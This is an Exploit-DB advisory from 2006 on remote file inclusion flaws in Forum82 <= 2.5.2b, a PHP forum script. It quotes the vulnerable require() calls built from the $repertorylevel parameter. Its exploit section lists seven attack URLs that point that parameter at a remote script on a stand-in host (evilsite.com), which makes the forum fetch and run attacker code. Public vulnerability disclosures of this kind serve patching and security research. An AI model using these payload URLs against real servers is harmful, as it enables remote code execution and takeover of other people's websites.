Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusions

EDB-ID:

2459




Platform:

PHP

Date:

2006-09-29


#==============================================================================================
#Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities
#===============================================================================================
#                                                                       
#Critical Level : Dangerous                                             
#                                                                       
#Script Dowload : http://www.comscripts.com/jump.php?action=script&id=805
#                                                                       
#Version : v2.5.2b 
#                                                         
#================================================================================================
#
#Bug in : 
#
#almost all files are infected...
#================================================================================================
#
#Vulnerable Code :
#
#		summary & example:
#
#	require($repertorylevel.'include/tables.inc.'.$e);
#       require($repertorylevel.'lang/lang.inc.'.$e);
#       require($repertorylevel.'include/db/mysql.inc.'.$e);
#         
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/search.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/message.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/member.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/mail.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/lostpassword.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/gesfil.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/forum82lib.php3?repertorylevel=http://evilsite.com/evilscript.txt?
#
#bla...bla...
#
#
#
#
#	the script files's are installed as .php3 to website.take care that...
#
#================================================================================================
#Discoverd By : Silahsiz Kuvvetler 
#
#
#Conatact : co-type[at]hotmail[dot]com
#
#GreetZ : FaTTaLGazI - NarcoTic - 0xyGen
#
#
#==================================================================================================

# milw0rm.com [2006-09-29]